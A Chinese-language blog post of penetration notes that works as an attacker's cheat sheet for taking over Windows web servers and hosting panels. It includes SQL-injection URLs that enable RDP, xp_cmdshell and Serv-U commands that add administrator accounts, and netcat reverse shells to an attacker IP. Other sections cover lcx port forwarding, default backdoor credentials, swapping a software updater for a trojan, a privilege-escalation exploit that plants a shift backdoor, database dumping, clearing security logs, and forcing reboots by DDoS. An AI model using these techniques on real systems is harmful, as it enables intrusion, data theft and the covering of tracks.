滲透筆記

【SQL語句直接開啓3389】

3389登陸關鍵註冊表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections

其中鍵值DenyTSConnections直接控制着3389的開啓和關閉,當該鍵值爲0表示3389開啓,1則表示關閉。而MSSQL的xp_regwrite的存儲過程可以對註冊進行修改,我們使用這點就可以簡單的修改DenyTSConnections鍵值,從而控制3389的關閉和開啓。

開啓3389的SQL語句:

syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

關閉3389的SQL語句:

syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--

【常見殺軟】

360tray.exe360實時保護

ZhuDongFangYu.exe360主動防禦

KSafeTray.exe金山衛士

McAfeeMcShield.exe 麥咖啡

SafeDogUpdateCenter.exe服務器安全狗

【windows提權中敏感目錄和敏感註冊表的利用】

敏感目錄目錄權限提權用途C:\Program Files\默認用戶組users對該目錄擁有查看權可以查看服務器安裝的應用軟件C:\Documentsand Settings\All Users\「開始」菜單\程序Everyone擁有查看權限存放快捷方式,可以下載文件,屬性查看安裝路徑,C:\Documents and Settings\All Users\Documents Everyone完全控制權限上傳執行cmd及exp,C:\windows\system32\inetsrv\Everyone完全控制權限上傳執行cmd及exp, C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini 默認用戶組users擁有查看權限安裝mysql時會將root密碼寫入該文件,C:\windows\system32\默認用戶組users擁有查看權限Shift後門一般是在該文件夾,可以下載後門破解密碼C:\Documentsand Settings\All Users\「開始」菜單\程序\啓動Everyone擁有查看權限可以嘗試向該目錄寫入vbs或bat,服務器重啓後運行。C:\RECYCLER\D:\RECYCLER\ Everyone完全控制權限回收站目錄。常用於執行cmd及exp,C:\Program Files\Microsoft SQL Server\默認用戶組users對該目錄擁有查看權限收集mssql相關信息,有時候該目錄也存在可執行權限, C:\Program Files\MySQL\ 默認用戶組users對該目錄擁有查看權限找到MYSQL目錄中user.MYD裏的root密碼,C:\oraclexe\默認用戶組users對該目錄擁有查看權限可以嘗試利用Oracle的默認賬戶提權C:\WINDOWS\system32\config默認用戶組users對該目錄擁有查看權限嘗試下載sam文件進行破解提權C:\Program Files\Geme6FTP Server\Remote Admin\Remote.ini默認用戶組users對該目錄擁有查看權限Remote.ini文件中存放着G6FTP的密碼c:\Program Files\RhinoSoft.com\Serv-U\c:\ProgramFiles\Serv-U\默認用戶組users對該目錄擁有查看權限ServUDaemon.ini中存儲了虛擬主機網站路徑和c:\windows\system32\inetsrv\MetaBase.xml 默認用戶組users對該目錄擁有查看權限IIS配置文件C:\tomcat5.0\conf\resin.conf默認用戶組users對該目錄擁有查看權限Tomat存放密碼的位置C:\ZKEYS\Setup.ini默認用戶組users對該目錄擁有查看權限ZKEY虛擬主機存放密碼的位置。

【提權中的敏感註冊表位置】

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\TcpMssql端口。

HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer DenyTSConnections 遠程終端值爲0 即爲開啓。

HKEY_LOCAL_MACHINE\SOFTWARE\MySQLAB\ mssql的註冊表位置。

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\華衆主機註冊表配置位置。

HKEY_LOCAL_MACHINE\SOFTWARE\CatSoft\Serv-U\Domains\1\UserList\ serv-u的用戶及密碼(su加密)位置。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp在該註冊表位置PortNumber的值即位3389端口值。

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Serversmysql管理工具Navicat的註冊表位置,提權運用請谷歌。

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\ParametersRadmin的配置文件,提權中常將其導出進行進行覆蓋提權。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\ IIS註冊表全版本泄漏用戶路徑和FTP用戶名漏洞。

HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass華衆主機在註冊表中保存的mssql、mysql等密碼。

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11星外主機mssql的sa賬號密碼,雙MD5加密。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\ControlSet002 星外ftp的註冊表位置,當然也包括ControlSet001、ControlSet003。

【wscript.shell的刪除和恢復】

載wscript.shell對象,在cmd下或直接運行:regsvr32 /u %windir%\system32\WSHom.Ocx

卸載FSO對象,在cmd下或直接運行:regsvr32.exe /u %windir%\system32\scrrun.dll卸載stream對象,在cmd下或直接運行:regsvr32 /s /u“C:\ProgramFiles\CommonFiles\System\ado\msado15.dll”如果想恢復的話只需要去掉/U 即可重新再註冊以上相關ASP組件,這樣子就可以用了。

【如何找到準確的終端連接端口】

在aspx大馬裏,點擊“系統信息”第三個就是目前的3389端口,或是執行命令查看正在運行的服務:tasklist /svc找到:svchost.exe 1688 TermService記住1688這個ID值,查看開放的所有端口:netstat -ano找到1688這個ID值所對應的端口就是3389目前的端口。

【s6提權提示Can not find wmiprvse.exe的突破方法】

突破方法一:

在IIS環境下,如果權限做得不嚴格,我們在aspx大馬裏面是有權限直接結束wmiprvse.exe進程的,進程查看裏面直接K掉在結束之後,它會再次運行,這時候的PID值的不一樣的。這時候我們回來去運行exp,直接秒殺。

突破方法二:

虛擬主機,一般權限嚴格限制的,是沒權限結束的,這時候我們可以考慮配合其他溢出工具讓服務器強制重啓,比如“直接使服務器藍屏重啓的東東”甚至可以暴力點,DDOS秒殺之,管理髮現服務器不通了首先肯定是以爲服務器死機,等他重啓下服務器(哪怕是IIS重啓下)同樣秒殺之。

【本地溢出提權】

計算機有個地方叫緩存區,程序的緩存區長度是被事先設定好的,果用戶輸入的數據超過了這個緩存區的長度,那麼這個程序就會溢出了,緩存區溢出漏洞主要是由於許多軟件沒有對緩存區檢查而造成的,利用一些現成的造成溢出漏洞的exploit通過運行,把用戶從users組或其它系統用戶中提升到administrators組,想要執行cmd命令,就要wscript.shell組建支持,或是支持aspx腳本也行,因爲aspx腳本能調用.net組件來執行cmd的命令。

【sa提權】

掃描開放的端口,1433開了就可以找sa密碼提權,用大馬裏的搜索文件功能,sa密碼一般在conn.asp config.asp web.config這三個文件。也可以通過註冊表找配置文件,看下支持aspx不,支持的話跨目錄到別的站點上找,找到之後用aspshell自帶的sql提權登錄再執行命令創建用戶即可。aspx馬提權執行命令有點不一樣,點擊數據庫管理選MSSQL--server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB--輸入帳號密碼連接即可,增加一個用戶:execmaster.dbo.xp_cmdshell 'net user jianmei daxia.asd /add';--

提升爲管理員:exec master.dbo.xp_cmdshell 'net localgroupadministrators jianmei /add';--

如果增加不上,說明是xp_cmdshell組建沒有,增加xp_cmdshell組建:Use master dbccaddextendedproc('xp_cmdshell','xplog70.dll')。

【root提權】

利用mysql提權的前提就是,服務器安裝了mysql,mysql的服務沒有降權,是默認安裝以系統權限繼承的(system權限),且獲得了root的賬號密碼,如何判斷一臺windows服務器上的mysql有沒有降權?cmd命令net user如果存在mysql mssql這樣用戶或者類似的,通常就是它的mssql mysql服務已經被降權運行了,如何判斷服務器上是否開啓了mysql服務?開了3306端口,有的管理員會把默認端口改掉,另一個判斷方法就是網站是否支持php,一般支持的話都是用mysql數據庫的。

【何查看root密碼】

在mysql的安裝目錄下找到user.myd這個文件,root就藏在裏面,一般是40位cmd加密,一些php網站安裝的時候用的是root用戶,在conn.asp與config.asp文件裏。有時會顯得很亂,這時就需要自己去組合,前17位在第一行可以找到,還有23位在第三行或是其他行,自己繼續找。可以直接用php腳本里“mysql執行”,或是上傳個UDF.php,如果網站不支持PHP,可以去旁一個php的站,也可以把UDF.php上傳到別的phpshell上也可以。填入帳號密碼之後,自然就是安裝DLL了,點擊“自動安裝Mysql BackDoor”顯示導出跟創建函數成功後,緊接着執行增加用戶的命令即可。

注意:5.0版本以下(包括5.0的)默認c:\windows\系統目錄就可以了,5.1版本以上的不能導出到系統目錄下創建自定義函數,只能導出在mysql安裝目錄下的lib/plugin目錄中。

例如:D:/Program Files/MySQL/MySQL Server5.1/lib/plugin/mysql.dll如果密碼看不見,或是組合不到40位,就本地安裝一個mysql吧。

1、停止mysql服務。

2、替換下載下來的3個文件(user.MYI user.MYD user.frm)。

3、cmd切換到bin目錄下,進入mysql安全模式,cmd命令:mysqld-nt--skip-grant-tables。

4、重新打開一個cmd 切換到bin目錄下,cmd命令:mysql -u root 版本不同有可能是:mysql -uroot –proot。

5、最後查詢一下就出來了selectuser,password from mysql.user;

【serv-u提權】

這個文件裏包含serv-u的md5密碼:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini

找到這個文件:ServUDaemon.ini 打開找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2再拿md5密文去解密,再用現在的密碼登陸提權即可。serv-u提權的前提是43958端口開了,且知道帳號密碼!如果帳號密碼默認,直接用shell裏面的serv-u提權功能即可搞定,建議用aspx馬、php馬去提權,因爲可以看回顯。530說明密碼不是默認的,回顯330說明成功,900說明密碼是默認的,在程序裏找個快捷方式,或是相關的文件進行下載到本地,再查看文件的屬性,就可以找到serv-u的安裝目錄了。目錄有修改權限之serv-u提權:找到serv-u的目錄,再找到用戶的配置文件ServUDaemon.ini,直接增加一個用戶代碼,保存!接着本地cmd命令:ftp服務器ip,回車,輸入帳號密碼再回車,接着先試試普通的cmd命令提權,不行的話就使用ftp提權的命令:

Quote site exec net user jianmei daxia /add 增加一個用戶

Quote site exec net localgroup administrators jianmei /add 提升到管理員權限

200 EXEC command successful (TID=33)執行成功的回顯信息

Maintenance=System 權限類型多加一行指定新加帳號爲系統管理員

ReloadSettings=True 在修改ini文件後需加入此項,這時serv-u會自動刷新配置文件並生效

【端口轉發】

什麼情況下適合轉發端口?

1.服務器是內網,我們無法連接。

2.服務器上有防火牆,阻斷我們的連接。

轉發端口的前提,我們是外網或是有外網服務器。找個可讀可寫目錄上傳lcx.exe本地cmd命令:lcx.exe -listen 1988 4567(監聽本地1988端口並轉發到4567端口)接着shell命令:/cc:\windows\temp\cookies\lcx.exe -slave本機ip 1988 服務器ip 3389(把服務器3389端口轉發到本地4567端口)之後本地連接:127.0.0.1:4567 (如果不想加上:4567的話,本地執行命令的時候,把4567換成3389來執行就行了)上是本機外網情況下操作,接着說下在外網服務器裏如何操作:上傳lxc.exe cmd.exe到服務器且同一目錄,執行cmd.exe命令:lcx.exe -listen 1988 4567接着在aspxshell裏點擊端口映射,遠程ip改爲站點的ip,遠端口程填1988,點擊映射端口,接着在服務器裏連接127.0.0.1:4567就可以了。

【nc反彈提權】

當可以執行net user,但是不能建立用戶時,就可以用NC反彈提權試下,特別是內網服務器,最好用NC反彈提權。不過這種方法, 只要對方裝了防火牆, 或是屏蔽掉了除常用的那幾個端口外的所有端口,那麼這種方法也失效了。找個可讀可寫目錄上傳nc.execmd.exe。

-l 監聽本地入棧信息

-p port打開本地端口

-t 以telnet形式應答入棧請求

-e 程序重定向

本地cmd執行:nc -vv -l -p 52 進行反彈,接着在shell裏執行命令:c:\windows\temp\nc.exe -vv 服務器ip 999 -e c:\windows\temp\cmd.exe最好是80或8080這樣的端口,被防火牆攔截的機率小很多,執行成功後本地cmd命令:cd/(只是習慣而已),接着以telnet命令連接服務器:telnet 服務器ip 999,回車出現已選定服務器的ip就說明成功了,接着權限比較大了,嘗試建立用戶!本地cmd執行:nc -vv -l -p 52 進行反彈c:\windows\temp\nc.exe -ec:\windows\temp\cmd.exe服務器ip 52,shell執行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe,一般這樣的格式執行成功率很小,不如直接在cmd那裏輸入:c:\windows\temp\nc.exe命令這裏輸入:-vv服務器ip 999 -ec:\windows\temp\cmd.exe,這個技巧成功率比上面那個大多了,不單單是nc可以這樣,pr這些提權exp也是可以的。

【星外提權】

如何知道是不是星外主機?

第一:網站物理路徑存在“freehost”。

第二:asp馬裏點擊程序,存在“7i24虛擬主機管理平臺”“星外主機”之類的文件夾,默認帳號:freehostrunat與默認密碼:fa41328538d7be36e83ae91a78a1b16f!7。freehostrunat這個用戶是安裝星外時自動建立的,已屬於administrators管理組,而且密碼不需要解密,直接登錄服務器即可。

星外常寫目錄:

C:\RECYCLER\

C:\windows\temp\

e:\recycler\

f:\recycler\

C:\php\PEAR\

C:\WINDOWS\7i24.com\FreeHost

C:\php\dev

C:\System Volume Information

C:\7i24.com\serverdoctor\log\

C:\WINDOWS\Temp\

c:\windows\hchiblis.ibl

C:\7i24.com\iissafe\log\

C:\7i24.com\LinkGate\log

C:\Program Files\Thunder Network\Thunder7\

C:\Program Files\Thunder Network\Thunder\

C:\Program Files\Symantec AntiVirus\SAVRT\

c:\windows\DriverPacks\C\AM2

C:\Program Files\FlashFXP\

c:\Program Files\Microsoft SQLServer\90\Shared\ErrorDumps\

C:\Program Files\Zend\ZendOptimizer-3.3.0\

C:\Program Files\Common Files\

c:\Documents and Settings\All Users\ApplicationData\Hagel Technologies\DU Meter\log.csv

c:\Program Files\360\360Safe\deepscan\Section\mutex.db

c:\Program Files\Helicon\ISAPI_Rewrite3\error.log

c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log

c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf

c:\Program Files\Common Files\SymantecShared\Persist.bak

c:\Program Files\Common Files\SymantecShared\Validate.dat

c:\Program Files\Common Files\SymantecShared\Validate.dat

C:\Program Files\Zend\ZendOptimizer-3.3.0\docs

C:\Documents and Settings\All Users\DRM\

C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection

C:\Documents and Settings\All Users\ApplicationData\360safe\softmgr\

C:\ProgramFiles\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

C:\Documents and Settings\All Users\ApplicationData\Microsoft\Media Index\

【ee提權法】

找個可讀可寫目錄上傳ee.exe,cmd命令:/c c:\windows\temp\cookies\ee.exe -i(獲取星外帳號的id值,例如回顯:FreeHost ID:724)接着命令:/c c:\windows\temp\cookies\ee.exe -u 724(獲取星外的帳號密碼)。

【vbs提權法】

找個可讀可寫目錄上傳cscript.exe iispwd.vbs,md命令:/c"c:\windows\temp\cookies\cscript.exe" c:\windows\temp\cookies\iispwd.vbs

意思是讀取iis,這樣一來,不但可以獲取星外的帳號密碼,還可以看到同服務器上的所有站點的目錄。

可行思路大全:經測試以下目錄中的文件權限均爲everyone,可以修改,可以上傳同文件名替換,刪除,最重要的是還可以執行。

360殺毒db文件替換:

c:\ProgramFiles\360\360SD\deepscan\Section\mutex.db

c:\ProgramFiles\360\360Safe\deepscan\Section\mutex.db

C:\ProgramFiles\360\360Safe\AntiSection\mutex.db

IISrewrite3文件替換:

C:\ProgramFiles\Helicon\ISAPI_Rewrite3\Rewrite.log

C:\ProgramFiles\Helicon\ISAPI_Rewrite3\httpd.conf

C:\ProgramFiles\Helicon\ISAPI_Rewrite3\error.log

諾頓殺毒文件替換:

c:\ProgramFiles\CommonFiles\SymantecShared\Persist.bak

c:\ProgramFiles\CommonFiles\SymantecShared\Validate.dat

c:\ProgramFiles\CommonFiles\SymantecShared\Persist.Dat

一流過濾相關目錄及文件:

C:\7i24.com\iissafe\log\startandiischeck.txt

C:\7i24.com\iissafe\log\scanlog.htm

Zend文件替換:

C:\Program Files\Zend\ZendOptimizer3.3.0\lib\Optimizer3.3.0\php5.2.x\ZendOptimizer.dll

華盾文件替換:

C:\WINDOWS\hchiblis.ibl

Flash文件替換:

C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx

DU Meter流量統計信息日誌文件替換:

c:\Documents\and\Settings\All\Users\Application\Data\Hagel\Technologies\DU\Meter\log.csv

【360提權】

找個可讀可寫目錄上傳360.exe,md命令:/c c:\windows\temp\cookies\360.exe會提示3段英文:

360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2

You will get a Shift5 door!

Shift5 Backdoor created!

這是成功的徵兆,接着連接服務器連按5下shift鍵,將彈出任務管理器,點擊新建任務:explorer.exe會出現桌面,接下來大家都會弄了。

【搜狗提權】

搜狗的目錄默認是可讀可寫的,搜狗每隔一段時間就會自動升級,而升級的文件是pinyinup.exe我們只要把這個文件替換爲自己的遠控木馬,或是添加賬戶的批處理,等搜狗升級的時候,就可以達成我們的目的了。

【華衆虛擬主機提權】

就經驗來說,一般溢出提權對虛擬主機是無果的,而且華衆又沒有星外那麼明顯的漏洞。所以華衆提權關鍵之處就是蒐集信息,主要註冊表位置:

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密碼

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密碼

c:\windows\temp下有hzhost主機留下的ftp登陸記錄有用戶名和密碼以上信息配合hzhosts華衆虛擬主機系統6.x破解數據庫密碼工具使用,百度搜索:hzhosts華衆虛擬主機系統6.x破解數據庫密碼工具。

【N點虛擬主機】

N點虛擬主機管理系統默認數據庫地址爲:\host_date\#host# date#.mdb,rl直接輸入不行這裏咱們替換下#=%23空格=%20修改後的下載地址爲/host_date/%23host%20%23%20date%23196.mdb,據庫下載之後找到sitehost表FTPuser&FTPpass值FTPpass是N點加密數據然後用N點解密工具解密得到FTP密碼,N點默認安裝路徑C:\ProgramFiles\NpointSoft\npointhost\web\與D:\Program Files\NpointSoft\npointhost\web\默認權限可讀。遇到對方所用虛擬主機是N點時候可以考慮讀取該文件夾下載數據庫。

N點解密工具代碼:

<%

set iishost=server.CreateObject(“npoint.host”)

x=iishost.Eduserpassword(“FTPpass值”,0)

response.write x

%>

本地搭建N點環境在N點目錄打開訪問即可。得到密碼減去後10位字符即爲N點的虛擬主機管理密碼。然後需要在管理系統登陸確認下在hostcs表找到Hostip或者hostdomain

一般默認是Hostip=127.0.0.1 hostdomain=www.npointhost.com這裏可以不管因爲這裏不修改的話就是服務器默認ip地址sitehost表的host_domain就是綁定的域名直接查下IP地址即可咱們批量的話掃描的地址即可。管理系統地址即爲IP地址選擇虛擬主機登錄即可接下來傳shell大家應該都會了。接下來說提權hostcs表存有sa與oot賬戶的密碼解密方法一樣。默認都是解密結果123456還有就是在adminlogo存在N點系統管理密碼30位的cfs加密可以在http://www.md5.com.cn/cfs碰撞下試試或者用asm的工具破解下我的運氣不好沒成功過3057C0DB854C878E72756088058775這個是默認admin的密碼。

【拖庫】

access數據庫脫褲很簡單,直接下載數據庫即可,mssql數據庫可以用shell自帶的脫褲功能,也可以用asp脫褲腳本,找到數據庫連接信息的文件,例如:web.config.asp用帳號密碼登錄asp脫褲腳本,找到管理表,再找到會員庫(UserInfo),之後導出即可,mysql數據庫一般用php腳本,找網站數據連接信息:

'host' => 'localhost:3306', 數據庫ip

'user' => 'iwebs', 用戶

'passwd' => 'nnY5bvRNnJ4vKpmb', 密碼

'name' => 'iwebshop', 數據庫名

接着上傳php脫褲腳本,進入拖庫界面之後,左邊有一個選擇數據庫名的選項,這裏iwebshop,選擇數據庫名之後,就會出現列表,想脫哪個就點擊哪個,然後點擊select data

Import是導入的意思,而Export是導出的意思,我們在拖庫,當然是選擇Export了,之後選擇save,再點擊Export就開始脫褲了。

如果服務器上安裝了phpMyAdmin,也可以找到該頁面,用剛找到的root賬號密碼登錄進去,在裏面也是可以拖庫的,如同上傳php拖庫腳本一樣,操作差不多的。

【服務器】

命令提示符已被系統管理員停用?

解決方法:運行→gpedit.msc→用戶配置→管理模板→系統,在右側找到"阻止命令提示符",雙擊一下,在"設置"裏面選中"未配置" ,最後點擊"確定"。

如何判斷服務器的類型?

解決方法:直接ping服務器ip,看回顯信息進行判斷:

TTL=32

9X/ME

TTL=64

linux

TTL=128

2000X/XP

TTL=255

UNIX

爲什麼有時3389開放卻不能連接?

原因分析:有時候是因爲防火牆,把3389轉發到其他端口就可以連接了,有的轉發後依然是連接不上,那是因爲管理員在TCP/IP裏設置的端口限制。

解決方法:我們需要把端口轉爲TCP/IP裏設置的只允許連接的端口其中一個就可以了,更好的辦法是取消端口限制。

最簡單的往服務器上傳東西方法是什麼?

本機打開“HFS網絡文件服務器”這款工具,把需要上傳的工具直接拖進左邊第一個框內,複製上面的地址,到服務器裏的瀏覽器訪問,就可以下載了。

限制“命令提示符”的運行權限?

我的電腦(右鍵)--資源管理器中--點擊“工具”按鈕,選擇“文件夾選項”,切換到“查看”標籤,去掉“使用簡單文件共享(推薦)”前面的鉤,這一步是爲了讓文件的屬性菜單中顯示“安全”標籤,然後進入“c:\windows\system32\”,找到“cmd.exe”,點右鍵選擇“屬性”,切換到“安全”標籤,將其中“組或用戶名稱”中除了管理員外的所有用戶都刪除,完成後點“確定”這樣當普通用戶想運行“命令提示符”的時候將會出現“拒絕訪問”的警告框。

如何更改windows2003最大連接數?

windows2003中的遠程桌面功能非常方便,但是初始設置只允許2個用戶同時登陸,有些時候因爲我在公司連接登陸後斷開,同事在家裏用其他用戶登陸後斷開,當我再進行連接的時候,總是報錯“終端服務超過最大連接數”這時候我和同事都不能登陸,通過以下方法來增加連接數,運行:services.msc,啓用license logging,別忘了添加完畢後再關閉License Logging

打開win2k3的控制面板中的“授權”,點“添加許可”輸入要改的連接數。

如何清除服務器裏的IP記錄日誌?

1.我的電腦右鍵管理--事件查看器--安全性--右鍵清除所有事件。

2.打開我的電腦--C盤--WINDOWS--system32--config--AppEvent.Evt屬性--安全--全部都拒絕。

3.Klaklog.evt屬性--安全--全部都拒絕--SecEvent.Tvt屬性--安全--全部都拒絕。

按大家的要求DOC格式放在網盤上了。因爲是linux下的WPS可能內容格式有點錯亂。希望大家原諒。http://pan.baidu.com/s/1gdl9v8n 

發佈了10 篇原創文章 · 獲贊 7 · 訪問量 6萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章